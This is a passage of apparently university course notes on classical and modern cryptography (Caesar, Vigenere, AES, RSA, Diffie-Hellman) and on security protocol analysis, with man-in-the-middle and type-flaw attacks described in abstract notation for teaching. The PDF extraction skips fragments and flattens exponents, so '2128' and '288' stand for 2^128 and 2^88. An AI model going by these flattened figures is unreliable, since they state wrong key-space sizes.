cipher text letters K H O O R …
It is clear that this cipher does not offer much security; there are only 26
possible key values (of which one is not really useful; consider which one and
why) so we can only hope for log2 26 (i.e. less than 5) bits of security at best.
Conclusion 1: We need a sufficiently large key space.
However, the Ceasar cipher can be broken even more easily. The patterns
in the text remain unaltered (e.g. in Figure 9.5 the double L becomes double
O) allowing knowledge of text patterns to be used to easily find the key. For
example, by looking at the frequency of the letters one can conclude which letter
is most likely encryption of the letter E which also directly gives the key used.
The Caesar cipher uses a very structured (linear) operation to encode let-
ters; a rotation in which each letter moves by the same amount. If instead as
substitution we would use an arbitrary 1-to-1 mapping from letters to letters,
(also called bijection or permutation) where e.g. A could be encoded as E, B
as Z, C as P , etc. The key is the mapping itself which we could store as a
sequence of 26 letters (EZP . . .). The number of possible keys is now 26! or
approximately 288 possibilities, which corresponds to 88 bits. This may seem a
reassuring number as trying all keys, say at a million billion tries per second,
would still take thousands of years. Yet breaking such a cipher can be done,
even by hand, by looking at patterns in the text rather than trying all possible
keys (there is actually a type of puzzle based on this idea; in a filled in crossword
each letter is replaced by a number and the goal is to find the corresponding
mapping between numbers and letters). Conclusion 2: The non-linearity of the
substitution is a strength but not sufficient when working with single letters.
Also storage requirements for keys need to be considered.
2 What did that mean again in this setting ...
9.2. SYMMETRIC CRYPTOGRAPHY 163
plaintext letters H E L L O …
key word (repeats) B Y E B Y …
cipher text letters J D Q N N …
With a block size of n letters the size of the key space becomes 26n . However,
again an attacker can mount a more effective attack than just trying all possible
keys; first the attacker guesses the length of the key n. This guess can be verified
e.g. by checking that the frequencies of each n-th letter show the same pattern
as the frequencies normally occurring in a text or simply by the fact that the
next step succeeds. Finding the key is then an easy exercise of attacking a
Ceasar cipher n times.
Thus simply increasing the block size does not, by itself, solve the problem.
When our message is larger than the block size the repetitions still allow recogni-
tion of patterns. (What if our message is not longer than the block size and we
only send one message so no repetitions occur?3 ) Conclusion 3: Just increasing
the block size helps too little if the attacker can solve the problem one part at
a time.
From the conclusions above a natural goal would be to combine larger block
sizes with non-linear operations. Note, however, that a random 1-to-1 function
of the entire block (for example with block size 3 a mapping could be: AAA
maps to EQN , AAB maps to XP A, …ZZZ maps to SDI), while hard to break,
would give prohibitively large keys (EQN, XP A, . . . , ZZZ is over 50K letters
long). Conclusion 4: We would like to have random 1-to-1 mapping without
needing to store all its outputs. We could try to simulate this by not really
using a random function but one that we can compute based on a small piece
of random data that then is our key. Of course the output should look random;
it should not depend on the input or the key in an easy to detect way (such as
a linear relation). Modern block ciphers use this principle but before we can
describe those we need one more ingredient.
Modern Block Ciphers From the discussion above we can conclude that we
want to:
• have sufficiently large keys (Conclusion 1) but not too large (Conclusion 2).
If the best an attacker can do is to try all keys then 128 or 256 bits are
commonly used sizes. The key space grows exponentially in the size of the
key; if everybody in the world had a billion processors each able to try a
billion keys per second it would still take over a thousand years to try 2128
possibilities while 2256 approaches the estimated number of atoms in the
observable universe.
• have output depend on all input (recall Conclusion 3); we don’t want the
attacker to be able to analyse the cipher text one piece at a time. We can
use transposition to help achieve this but by itself it will not be enough
(recall Conclusion 5).
• prevent the attacker from detecting how the output depends on the input
or on the key (recall Conclusion 4).
Step 1 We try to hide the input. We can do this for example by the method
used in the one time pad and in Vigenere cipher (for letters); we add the
key to the input one bit at a time (that is we XOR the input and the key).
Note that (so far) an attacker could analyze the result one bit at a time
and the relation of output with input and key is linear. We thus need to
mix the bits and hide this relation in the next steps.
Step 3: Diffusion (Permutation) Mix the bits by moving them around (per-
mutation) and possibly doing a (linear) combination. By moving the bits
we try to hide how output bits depend on input bits so the attacker will
not know which bits belong to which byte.
Thus each in turn depends on a byte (due to step 2 in round 1) of the input and
the key. By repeating steps 1-3 several times (rounds) we ensure the attacker
will have to analyze the whole block at once and in a non-trivial way (due to
the included non-linear steps).
The above sketches the main idea of many of the modern block ciphers
(substitution-permutation ciphers). Each use repeated rounds applying confu-
sion and diffusion though they differ in the order of the steps and how they mix
the key with the input. Shuffling key bits between rounds, resulting in differ-
ent ‘round keys’, is also common. In Section 9.5 we will see two examples of
this in some more detail; the Data Encryption Standard and its successor, the
Advanced Encryption Standard. Now we first move to the basics of asymmetric
(a.k.a. public key) cryptography.
Diffie-Hellman Key Exchange Consider the following setup: Alice and Bob
want to create a shared key, e.g. to be able to use a symmetric cipher, but are
worried that someone may overhear their communication. Diffie-Hellman Key
Exchange could be used to solve this. In this system two public parameters
are set: a large prime number p and a generator a < p. Alice and Bob both
generate a random number, x and y respectively, raise a to the power of this
random number and send this to the other. The number r they receive they
again raise to the power of their random number and the result is the shared
secret key. Alice and Bob share the same key.
Alice uses
x
rbob mod p = (ay mod p)x mod p = ayx mod p,
and Bob uses
y
ralice mod p = (ax mod p)y mod p = axy mod p.
An eavesdropper could obtain ra and rb . However to make the key e.g. from
ralice one would need y. The attacker could try to obtain y from rb because
rbob = ay mod p in which only y is unknown. However, this is an instance
of solving a discrete logarithm problem in a finite group for which no efficient
algorithms are known. Thus if we use a large prime number p an eavesdropper
is highly unlikely to obtain the shared secret key.
This is a characteristic property of asymmetric ciphers; the security argu-
ment is that the attacker even if she knows the public key and the cipher text
would have to solve a ‘hard problem’ to extract the secret key and/or the plain-
text.
Note that the attacker model is very important for the security of this scheme.
For example, the scheme is not secure against a man in the middle attack. In
the man in the middle attacker model the attacker is able to not only listen to
messages but actually intercept and change them. If Eve can alter messages
9.4. BLOCK MODES: ENCRYPTING MORE THAN ONE BLOCK 167
′ ′
sent by Alice and Bob she could replace ax and ay by ax and ay after which
′ ′
both Alice (axy ) and Bob (ax y ) share keys with Eve while thinking they share
a key with each other.
symmetric key and this key stream is XORed with the plaintext to obtain the
cipher text. Note the similarity with the one-time pad; if the key stream is
‘sufficiently random’ then so is the cipher text. Also, like with the one-time pad,
the same key(stream) should not be reused. With OFB mode, an initialization
vector is encrypted to give the first block of key bits which then also replaces the
initialization vector and is re-encrypted to form the next block of key bits, etc.
(Using a different initialization vector enables one to generate multiple streams
from the same key in OFB mode.) The CFB mode is a slight variation of CBC
with a structure that resembles a stream cipher. In CBC an initialization vector
is encrypted to get the first block of random bits and the resulting cipher text is
then re-encrypted, thus re-seeding the pseudorandom number stream, but here
with data which also depends on the plain text.
Figure 9.9: Overview of Block modes ECB, CBC, CFB and OFB
9.5. EXAMPLE ALGORITHMS 169
Figure 9.10: In the Feistel structure a round consists of splitting the input into
two parts, applying a function F to the right hand side and XOR-ing the result
with the left hand side. This gives the new right hand side. The new left hand
side is the old right hand side.
AddRoundKey which XORs the current state with the round key. The round
key is also represented by a 4x4 byte matrix. We do not treat how the
round key is derived from the main key here.
SubBytes which applies an S-box substitution on each byte of the state. The
S-box that is used is given below (in hexadecimal format). Unlike the DES
S-box the AES S-box is invertible. Also, the AES S-box can be expressed
as a combination of several functions, allowing it to be computed rather
than stored, which may be relevant for devices with very limited storage
capability.
| 0 1 2 3 4 5 6 7 8 9 a b c d e f
---|--|--|--|--|--|--|--|--|--|--|--|--|--|--|--|--|
00 |63 7c 77 7b f2 6b 6f c5 30 01 67 2b fe d7 ab 76
10 |ca 82 c9 7d fa 59 47 f0 ad d4 a2 af 9c a4 72 c0
20 |b7 fd 93 26 36 3f f7 cc 34 a5 e5 f1 71 d8 31 15
30 |04 c7 23 c3 18 96 05 9a 07 12 80 e2 eb 27 b2 75
40 |09 83 2c 1a 1b 6e 5a a0 52 3b d6 b3 29 e3 2f 84
50 |53 d1 00 ed 20 fc b1 5b 6a cb be 39 4a 4c 58 cf
60 |d0 ef aa fb 43 4d 33 85 45 f9 02 7f 50 3c 9f a8
70 |51 a3 40 8f 92 9d 38 f5 bc b6 da 21 10 ff f3 d2
80 |cd 0c 13 ec 5f 97 44 17 c4 a7 7e 3d 64 5d 19 73
90 |60 81 4f dc 22 2a 90 88 46 ee b8 14 de 5e 0b db
a0 |e0 32 3a 0a 49 06 24 5c c2 d3 ac 62 91 95 e4 79
b0 |e7 c8 37 6d 8d d5 4e a9 6c 56 f4 ea 65 7a ae 08
c0 |ba 78 25 2e 1c a6 b4 c6 e8 dd 74 1f 4b bd 8b 8a
d0 |70 3e b5 66 48 03 f6 0e 61 35 57 b9 86 c1 1d 9e
e0 |e1 f8 98 11 69 d9 8e 94 9b 1e 87 e9 ce 55 28 df
f0 |8c a1 89 0d bf e6 42 68 41 99 2d 0f b0 54 bb 16
1 place to the left etc. As an effect, each column after the shift depends
on every column before the shift.
MixColumns which combines the four bytes in each column to a new column
by multiplying with the following matrix:
2 3 1 1
1 2 3 1
1 1 2 3
3 1 1 2
The basic functions are combined into ten rounds as follows: In the first round
a single AddRoundKey is performed. Rounds two to nine perform the sequence
SubBytes, ShiftRows, MixColumns, AddRoundKey and the final round leaves
out MixColumns, thus performing SubBytes, ShiftRows, AddRoundKey.
Each AES operation is invertible. Decryption simply inverts each encryption
step in the reverse order.
9.5.3 RSA
In 1978 Rivest, Shamir and Adleman were the first to publish a public key
system. Their RSA system works as follows:
172 CHAPTER 9. CRYPTOGRAPHY
Setup and key generation: Randomly choose two large prime numbers p, q
and compute modulus n = p ∗ q. Pick e and d such that ed = 1 mod ϕ(n)8
(knowing p and q one can compute d for a given e e.g. by using the extended
Euclidean algorithm). The public key is (e, n) and the private key (d, n). That
is, e and modulus n are made public and d is kept secret. The way of choosing
e and d guarantees that aed = a mod n for any a.
Encryption A plaintext can be any number less than n. To encrypt a plain-
text P raise it to the power e (modulo n), c = P e mod n.
Decryption To decrypt a cipher text C raise it to the power d (modulo n),
P = C d mod n.
The way of choosing e and d guarantees that aed = a mod n for any a.
Thus decryption works because C d = P ed mod n = P mod n. The public
information (e and n) is not sufficient to find d, p, q or ϕ(n) and this is essential
as knowing any of these would allow (finding d and) decrypting messages.
The large prime numbers p and q are randomly chosen; an attacker should
not be able to guess them. They should be sufficiently large as should their
difference (|p − q|) to ensure factoring n is actually difficult. All users should
have their own, distinct modulus n. The public key e is typically chosen to be
convenient value such as 3, 7 or 216 + 1 as this allows for efficient encryption
(and as we will give away this value anyway there is no need for it to be random).
The private key d on the other hand should be big (close in size to n) to prevent
it being guessed or derived efficiently from e and n.
As we are working modulo n there are up to n possible values. Thus if we
work in blocks as with symmetric ciphers, the maximum block size with RSA
is log2 (n). There are several ways to represent blocks as numbers in 0, . . . , n.
Typically some form of padding is used, for example by forming the most sig-
nificant bits from random salt creating a randomized encryption. The padding
ensures that the numbers are not too small which would give several problems:
if plaintext P is a small number then P e may be smaller than n (recall that e
may be small) and thus we are doing normal integer arithmetic where taking
an eth-root is easy, instead of modular calculations where such an operation is
hard.
Note that for RSA encrypting and decrypting are the same except for the
use of a different key and, as de = ed = 1 mod ϕ(n) we can reverse the role of
the encryption and decryption key; i.e. thus first decrypting a message and then
encrypting it also results in the same message. With this we can also use RSA
to perform signing; by decrypting the message we want to sign we generate a
signature that anyone can check with the public key and that only the holder
of the secret key can create. (We typically sign hashes of message rather than
messages themselves. If you are interested see the reading material, Handbook
of applied cryptography [22, Chapter 1], for more on hashes.)
The structure of RSA encryption and decryption also gives several other
properties, for example that the encryption of the product of two messages is
the product of the encryptions (modulo n), E(m ∗ m′ , (e, n)) = E(m, (e, n)) ∗
E(m′ , (e, n)) mod n. Combined with the observation above this allows one
to create blind signatures, i.e. to have Alice sign Bob’s message without Alice
learning the message: Bob generates a random mask r, encrypt this mask with
Alice’s public key (e, n) and multiplies the message (modulo n) with the en-
8 ϕ(n) = ϕ(p ∗ q) = (p − 1) ∗ (q − 1) for primes p and q.
9.6. COMPUTATIONAL SECURITY 173
crypted mask. The result, m ∗ re , is given to Alice to sign (decrypt). This text
does not reveal anything about m to Alice and by signing it she creates the
signature of m masked (i.e. multiplied) with r.
A first natural question to ask is: do such functions actually exist? The
perhaps surprising answer is that this is not known. A fundamental unanswered
question of complexity theory is whether P is equal to NP. Suppose that we
were to find a trapdoor function then computing its inverse (by the attacker)
is a problem that is not in P but is in NP which would prove that P ̸= NP:
computing the inverse is not allowed to be in P as it must be a hard problem for
the attacker. Yet, computing this inverse is easy for the holder of the key. Thus
a non-deterministic algorithm could first ‘guess’ the secret and then perform the
same computations as the key holder.
Still, though no-one has proven the existence of trapdoor functions, many
candidates exist which have been studied extensively and for which no efficient
algorithm to compute the inverse are known. One example is factoring the prod-
uct of two primes; creating the product from the primes is easy while factoring a
(large) number is difficult. However, if you know one of the two primes finding
the other is easy again.
9.7 Summary
The goal after this chapter is that you will have a good idea of the basics of
cryptography; know how symmetric and public key ciphers can be used and are
able to give examples of these ciphers. It should also be clear what ‘cipher X
is secure’ means in any given context and you should be able to check whether
this is the case for a given setting and scheme.
9.7.1 Literature
Suggested reading/viewing
2. Do block modes apply only to symmetric cipher or are they also relevant
to asymetric ciphers? Why?
3. What are main benefits of padding with random salt when using RSA?
9.8. EXERCISES (NOT GRADED: EXAM PREPARATION) 177
4. Once again consider the online music store scenario of Exercise 6 in Chap-
ter 1. Enhance the requirements you extracted and security design that
you made by considering threats and techniques introduces in this chap-
ter. Indicate how you would apply the techniques, what trade-offs this
imposes and what effect they have on both the attacks as well as on the
goals of the legitimate actors in the system, and, if applicable what new
goals/actors you need to introduce.
5. Decipher the following (English) text:
Ftq Husqzqdq oubtqd ue zaf hqdk eqogdq.
6. Suppose that amongst six people each pair wants to be able to communi-
cate securely without the others being able to eavesdrop.
(a) How many different keys will they need in total if they use a symmet-
ric encryption algorithm and how many if they use an asymmetric
encryption algorithm?
(b) How many keys does a person have to store secretly in both cases?
7. Four methods to encrypt multi-block messages are ‘Electronic Code Book’,
‘Cipher Block Chaining’, ‘Output Feedback’, and ‘Cipher Feedback’. (See
Figure 9.9.)
(c) Show that the uniform distribution over a domain of size 2n has an
entropy of n. (This is the highest entropy that can be achieved on
this domain.)
9. The one-time pad makes a message indistinguishable from messages of
equal length. With letters (instead of bits) you can apply the one time
pad by adding the key to the message modulo 26.
(a) This looks a lot like the Vigenere cipher. Why does the analysis
method to attack that cipher not work here?
The encryption is secure no matter the amount of computational
power the attacker has available; even trying all possible keys will
not help the attacker:
(b) Find two keys such that ciphertext ‘AFIGHT’ decodes to ‘YESYES’
and ‘NONONO’.
The one-time pad is not very convenient in use; the key is as long as
the message and can only be used once.
(c) What happens if the key of a one-time pad is reused?
(d) Would it be possible to make an unconditionally secure cipher with
a shorter or reusable key? (Remember question 8)?
Chapter 10
Analysis of Security
Protocols
10.1 Introduction
A protocol is a ‘recipe’ for communication; it describes the sequence of messages
that the participants in the communication should send and earlier in the course
we have seen protocols working at different layers of the network stack. Here we
focus on so called security protocols, protocols that aim to provide secure com-
munication over an otherwise insecure channel. Here ‘secure’ can mean different
things. It could refer to confidentiality of the data exchanged, to proper authen-
tication of the parties involved and their messages, to a combination thereof,
etc. For Internet banking, for example, one would want both authentication
and confidentiality. Obviously the requests for transfers by the client need to
be authenticated but also the bank should be properly authenticated before you
Figure 10.1: A login page over HTTPS with some security goals.
179
180 CHAPTER 10. ANALYSIS OF SECURITY PROTOCOLS
enter your login information so this information does not get stolen (for exam-
ple by a phishing attack) and misused. Confidentiality is needed to protect the
privacy of the client (as well as to keep the login information secret).
In earlier chapters we have seen mechanisms that can help achieve the goals
of security protocols; symmetric encryption, digital signatures, etc. Engineering
a good security protocol requires combining these methods in a way such that all
desired security properties are achieved. In this chapter we will look at how to
analyse security protocols which, as cryptography plays a large role in achieving
the security properties of protocols, are also often referred to as cryptographic
protocols.
SSH Another commonly used security protocol is Secure Shell (SSH) which is
used to remotely log onto a server. It is a transport layer protocol that supports
tunneling, in which traffic for e.g. X11 (graphical interface) connections can be
forwarded over the secure SSH connection. SCP for securely copying files and
SFTP, a secure alternative for FTP (File Transfer Protocol), also use SSH. SSH
supports password authentication of the client but also a public key can be used;
you place your public key on your account on the server. Your local SSH client
can then connect to the server by using your private key instead of you entering
a password. (Though you would likely want to protect your private key with a
password/phrase but then against attackers with access to your machine rather
than eavesdroppers on the network - i.e. a completely different attacker model.)
External authentication (e.g. Kerberos, see below) is also possible.
1 TLS is basically a new version of SSL (Secure Sockets Layer). The names are often used
interchangeably.
10.2. EXAMPLE SECURITY PROTOCOLS 181
Technically SSH is very similar to SSL/TLS and they achieve similar goals
(creating a secure channel between a client and a host). SSL is mostly used
for web traffic that needs to be secure, such as when transmitting valuable
information (e.g. a credit card number) over the internet while SSH is often used
for security executing commands remotely. SSL focuses on using certificates to
authenticate the server and does not do client authentication (though this can
be done over the created secure connection) while SSH has client authentication
built in. The main reason for having both protocols is historical.
Alice cannot decrypt the ticket {KAB , A, T exp}KBS as she does not have the
key KBS ; only Bob and the server have this key. Yet she can forward the ticket
to Bob along with an extra message that {checksum, timestamp}KAB which
confirms that she also knows KAB .
Note that once Alice and Bob share a key Bob can take the role of server
in a new run of the protocol. This occurs, for example, if Bob is the Ticket
Granting Service; Alice will contact server Bob to get a ticket for some other
service Charlie.
Kerberos can be used, not only within a single ‘realm’ (the services under
auspices of the authority which controls the authentication service) but also
across realms. (See Figure 10.3) A client in realm 1 wanting to use a service
in realm 2, will get a ticket for the authentication service of realm 2 from its
own authentication service. With that ticket it can then ask for a ticket of the
realm 2 service (which in turn may be the Ticket Granting Service for realm 2).
Suppose that Alice uses an online banking service Bob and a subscription
based joke-a-day service Mallory. Both services use our protocol for authen-
tication. When Alice authenticates to Mallory to get her joke of the day,
A→M :A
Mallory misuses this fact and will try to pretend to be Alice to Bob
M (A) → B : A
Bob sends his challenge back to ‘Mallory pretending to be Alice’ (or directly
to Alice depending on how the routing works; it does not matter as Mallory
can intercept all messages).
B → M (A) : {N }pk(A)
Mallory cannot decrypt the message … but she can forward it to Alice …
M → A : {N }pk(A)
Alice is waiting for a challenge from Mallory and will dutifully respond.
A → M : {N }pk(M )
Now this message Mallory can decrypt. She gets N and answers Bob’s
challenge.
M → B : {N }pk(B)
Now Mallory can empty Alice’s bank account and ‘the joke is at the expense
of Alice...’
With the definition in place we can return to our original question; is the
protocol correct, does it achieve authentication of Alice? Of course this question
is not yet complete; we have defined the security goals but we also need to give
the attacker model.
As the network is a dangerous place (see Chapter 8) we play it safe in
our attacker model and assume the worst case scenario in which the attacker,
we will call her Mallory, has full control over the network; she can intercept
all messages, block or change them, and create new messages. The attacker
may also have a valid identity (or even several) on the network with which she
can partake in protocol runs. However, we also need to assume some limits
on Mallory’s abilities. If she could also extract the nonce from the challenge
message {N }pk(A) without knowing Alice’s private key she can easily break
the authentication; she can send message A to Bob, intercept Bobs response,
extract the nonce N and return it to Bob. However, this is a problem with the
186 CHAPTER 10. ANALYSIS OF SECURITY PROTOCOLS
cryptography, and not with the protocol! We want to separate these concerns;
analyze the protocol without complicating matters too much with the details
of how the cryptography works. Thus in the protocol analysis we typically
assume that the cryptography simply works (the so called perfect cryptography
assumption).
Therefore our complete question becomes: Does the protocol achieve authen-
tication of Alice when the attacker has full control over the network but cannot
‘break the cryptography’? It may seem to work correctly at first glance; only
Alice can extract the nonce N from the message and, as it is fresh, when Bob
receives the nonce back he knows that Alice did this extraction after he sent
it. Thus Alice is alive and well and is answering the challenge. Yet what Bob
does not know is whether Alice is actually trying to authenticate to Bob. Per-
haps Mallory somehow tricked Alice into answering the challenge. The attack
in Figure 10.5 shows how Mallory might go about this.
The Man (Mallory) in the Middle attack (Figure 10.5) on our protocol works
as follows: Alice wants to authenticate to Mallory and when Alice sends her
authentication request to Mallory, Mallory sends one to Bob pretending to be
Alice in the protocol run with Bob. Bob will send a challenge to check whether
Mallory is actually Alice. Mallory cannot answer this challenge herself but can
forward it to Alice (pretending it came from Mallory herself). As Alice is waiting
for a challenge to come from Mallory, she is trying to authenticate to Mallory
after all, she will answer this challenge, decrypting the nonce and returning it
to Mallory encrypted with Mallory’s public key. In this way Mallory obtains
the nonce and can now answer the challenge from Bob by encrypting the nonce
with his public key.
Even in this simple example we managed to get it wrong. It seems to be
trickier than it looks. This is a general problem; even though protocols may
seem simple, it is easy to make mistakes.
“Security protocols are three line programs that people still manage
to get wrong.”
– Roger Needham –
We could try to fix the flaw but how can we be sure that our fix works and
there are no further mistakes. Formal analysis supported with automated ways
of checking models or proofs, can help to find mistakes. Formal analysis forces
you to be very precise in your assumptions and descriptions and automatically
checks (or even generates) the conclusions you can draw from them. It is im-
portant to remember that, as we also see with ‘provable secure cryptography’,
a formal proof is only as good as its input. If we make mistakes in modeling
the protocol and its context, or incorrect assumptions about how the protocol
is used, the attacker’s initial knowledge and capabilities, etc. a formally verified
protocol may still be vulnerable. Thus formal analysis is very useful and needs
to be done, but we should not blindly rely on its results.
A → M (B) : A
M (A) → B : A
B → M (A) : {N }pk(A)
M (B) → A : {N }pk(A)
A → M (B) : {N }pk(B)
M (A) → B : {N }pk(B)
him.
Patched protocol and attempted attack. The message of Mallory does not
match the expectation of Alice so she does not advance the protocol; Mallory
does not learn N .
A→B:A A→M :A
B → A : {N, B}pk(A) M (A) → B : A
A → B : {N }pk(B) B → M (A) : {N, B}pk(A)
M (A) → A : {N, B}pk(A)
A ̸→ M : (was expecting{?, M }pk(A) )
The adjustment makes the attack above impossible. But are there any other
attacks that are still possible? Ideally we would create a formal proof but this
is outside of the scope of this course; the master course Verification of Security
Protocols (2IF02) addresses this topic. Yet we can reason using the Dolev-Yao
model. An informal argument for correct authentication (of Alice to Bob) should
at least argue the following points:
1. A secret of Alice is used; a challenge that only Alice can answer ensures
that the attacker cannot complete the authentication without involving
Alice.
2. Freshness of Alice’s response; the secret has to be used in this session and
not be e.g. replayed from an earlier session.
3. Alice’s response is meant to authenticate her to Bob; when Alice is not
trying to authenticate to Bob it should not be possible to trick her into
answering the challenge for the attacker.
We addressed point 3 above by adding Bob’s name in the challenge that is
sent to Alice. But is this always sufficient to prevent Alice from being confused?
10.3. WHAT MAKES A SECURITY PROTOCOL TICK: PROTOCOL DESIGN189
Let us consider another example protocol: the Otway-Rees Protocol for session
key distribution using a trusted server (see Figure 10.9). This protocol illustrates
a different method of authentication; via a trusted third party and also allows
us to illustrate another possible attack against protocols.
Otway-Rees and type flaw attacks The Otway-Rees protocol uses a trusted
server to create a short term session key (Kab) for communication between Al-
ice and Bob. Alice and Bob already share (long term) keys (Kas and Kbs
respectively) with the trusted server. The server is trusted in that we assume it
will behave correctly; generate good fresh random keys, not leak information to
the attacker (other than what is leaked by correctly following the protocol) nor
misuse the information it has. The server, for example, will know the key used
by Alice and Bob to communicate but this is not considered to be a problem.
Note that the protocol uses only symmetric cryptography. The key that people
share with the server is used to authenticate them rather than a public-private
key pair.
1. A → B : M s, A, B, {Na , M s, A, B}Kas
2. B → S : M s, A, B, {Na , M s, A, B}Kas , {Nb , M s, A, B}Kbs
3. S → B : M s, {Na , Kab}Kas , {Nb , Kab}Kbs
4. B → A : M s, {Na , Kab}Kas
that care needs to be taken to ensure that messages cannot be misused elsewhere
in the protocol.
Let us return to authentication but now both ways, i.e. mutual authentica-
tion. The Needham-Schroeder protocol is a well known protocol that has been
used for this purpose.
1. A → B : {A, Na }pk(B)
2. B → A : {Na , Nb }pk(A)
3. A → B : {Nb }pk(B)
2. B → A : {Na , Nb , B}pk(A)
The type flaw attack, shown in Figure 10.11, involves two type confusions.
The first is that Bob misinterprets M in message II.1 as a nonce. He responds
with message {M, Nb , B}pk(A) to prove he knows M , which he thinks is a nonce
from A, and adds his own nonce Nb as a challenge to A. Mallory cannot decrypt
this message, however, she can start a new session (III) with Alice and send
this message as the first message of this new session. Alice expects new sessions
from Mallory to start with a message of the form {M, ?} where ? is the challenge
(nonce) from M . She gets {M, Nb , B}. Thus, in a second type confusion, she
may interpret all of (Nb , B) to be the nonce from Mallory. Responding to
this challenge she sends {(Nb , B), Na′ , A}pk(M ) to prove she knows Mallory’s
challenge (Nb , B) and give her own challenge to Mallory (Na′ ). Now Mallory
can decrypt this message and extract everything including Nb . Knowing Nb she
can finally answer the challenge from Bob. Mallory has successfully pretended
to Alice and to Bob that she knows the ‘nonces’ (M and Nb ) that will be used
to build the key for this session.
Privacy Our authentication protocol design (e.g. Figure 10.8) introduces some
privacy concerns. First of all, Alice’s identity is sent in the clear. The protocol
aims to authenticate Alice only to Bob, not let everybody listening on the
network know that Alice wants to talk to Bob. For our protocol we can solve
this by encrypting Alice’s identity with Bob’s public key. Yet even then there is
a potential privacy issue: an attacker could determine whether Bob is willing to
talk to Alice. Anyone, including the attacker, can send the message {A}pk(B) .
Even though the attacker cannot answer the challenge from Bob, the very fact
that Bob sends a challenge is sufficient.
Bob is only willing to talk to some parties and only those parties should be
able to learn when he is willing to talk to them.
If Bob is not willing to create a session with Alice he sends a decoy response
(2′ ). Here K is any random key.
A possible solution to hide Bob’s choice is to always send a reply in such a way
that only Alice will be able to tell the difference. Abadi’s private authentication
protocol, see Figure 10.12, tries to achieve this. For this protocol to work the
decoy message should look real (be indistinguishable from a real message for
the attacker). Also the way we handle the decoy message should look real. For
example, if the decoy is easier to make than the real response and we respond
too quickly then the attacker may deduce the message is a decoy. (This is an
example of the so called side-channel information.)
Here we have mainly considered preventing Mallory on her own (so without
Alice being active) being able to tell whether Bob will talk to Alice. If Alice
herself connects to Bob, Mallory may be able to tell Bob’s choice by the fact that
192 CHAPTER 10. ANALYSIS OF SECURITY PROTOCOLS
Alice and Bob use a protocol for authenticating Bob (a) and Alice wants to
send secret messages to Bob (b). When Alice sends her secret Mallory can
obtain it by using the other protocol:
Alice and Bob continue sending each other messages after the authentication
protocol completes. Preventing Bob’s choice from leaking in such situation
requires more advanced anonymization techniques.
Use of multiple protocols As a final aspect let us consider the use of mul-
tiple protocols. Two protocols that are by themselves correct may became vul-
nerable/flawed when combined. A basic challenge response protocol using the
public key of Bob, combined with a protocol that relies on secrecy of messages
encrypted with this public key are obviously flawed when combined. (See for
example Figure 10.13). To address this we should analyse all protocols that
may be used together. Using different keys for different protocols would be one
way to avoid confusion of at least the encrypted parts of the messages between
protocols. The obvious drawback is that users need to have multiple keys.
10.4 Summary
It is hard to design a good protocol. Attacks such as man in the middle or type
flaw can break security goals of a protocol such as authentication and secrecy.
Very subtle flaws can have big consequences. This also makes the analysis of
protocols a difficult exercise. Analysis by formal methods is needed to provide
some degree of rigor.
10.4.1 Literature
Suggested reading The Spore repository contains many examples of proto-
cols and attacks against them. You do not need to know these protocols by heart
but should be able to understand a given protocol specification and analyse it
to find attacks.
• The Security Protocol Open Repository (Spore) [16].
4. Consider the man (Mallory) of the middle attack in Figure 10.5. Write
down the attacker knowledge in each step. Use a canonical form, i.e. write
only terms that cannot be decomposed any further by Mallory.
5. Consider again the online music store of the previous chapters. Review
your requirements analysis, adding security protocol considerations; threats
and countermeasures where appropriate.
6. Alice has a public key known to everyone. Bob knows a secret sB (eg a
password) that Alice will recognize as being Bob’s when she sees it (eg
because she has the hash of the password).
How could you fix the protocol for the properties above not yet achieved?
(a) A->B: A, K
194 CHAPTER 10. ANALYSIS OF SECURITY PROTOCOLS
[1] https://w2.eff.org/Privacy/Crypto/Crypto_misc/DESCracker/.
[2] M. Abadi. Security protocols and their properties. In NATO Science Series:
Volume for the 20th International Summer School on Foundations of Secure
Computation, pages 39–60, Marktoberdorf, Germany, 1999. http://www.
cse.ucsc.edu/~abadi/allpapers.html#marktoberdorftoo.
[5] S. Bellovin. Defending against sequence number attacks, 1996. IERF RFC
1948 http://www.ietf.org/rfc/rfc1948.txt.
[9] Sherman SM Chow, Joseph K Liu, Lucas CK Hui, and Siu Ming Yiu.
Provable Security: 8th International Conference, ProvSec 2014, Hong Kong,
China, October 9-10, 2014. Proceedings, volume 8782. Springer, 2014.
[11] R. J. Corin and J. I. den Hartog. A probabilistic hoare-style logic for game-
based cryptographic proofs. In M. Bugliesi, B. Preneel, and V. Sassone,
editors, ICALP 2006 track C, Venice, Italy, volume 4052 of Lecture Notes
in Computer Science, pages 252–263, Berlin, July 2006. Springer-Verlag.
195
196 BIBLIOGRAPHY
[13] Marcin Czenko, Sandro Etalle, Dongyi Li, and William H Winsborough.
An introduction to the role based trust management framework rt. In
Foundations of security analysis and design IV, pages 246–281. Springer,
2007. doc.utwente.nl/64136/1/IntroRTFinal.pdf.
[15] Golnaz Elahi and Eric S. K. Yu. A goal oriented approach for modeling
and analyzing security trade-offs. In ER, pages 375–390, 2007.
[18] J.I. den Hartog. Towards mechanized correctness proofs for cryptographic
algorithms: Axiomatization of a probabilistic hoare style logic. Science of
Computer Programming, 74(1-2):52–63, 2008.
[19] Neal Koblitz and Alfred J Menezes. Another look at” provable security”.
Journal of Cryptology, 20(1):3–37, 2007.
[22] Alfred J. Menezes, Paul C. van Oorschot, and Scott A. Vanstone. Handbook
of Applied Cryptography. CRC Press, 5th edition, 2001. http://cacr.
uwaterloo.ca/hac/.
[24] Brett Stone-gross, Marco Cova, Lorenzo Cavallaro, Bob Gilbert, Martin
Szydlowski, Richard Kemmerer, Christopher Kruegel, and Giovanni Vigna.
Your botnet is my botnet: Analysis of a botnet takeover.
[25] F. Turkmen, J.I. den Hartog, S. Ranise, and N. Zannone. Analysis of xacml
policies with smt. In 4th Conference on Principles of Security and Trust
(POST 2015), 2015. to appear.
BIBLIOGRAPHY 197
[26] F. Turkmen, J.I. den Hartog, and N. Zannone. Poster: Analyzing access
control policies with smt. In Proceedings of the 21st ACM Conference on
Computer and Communications Security (CCS 2014). ACM, 2014.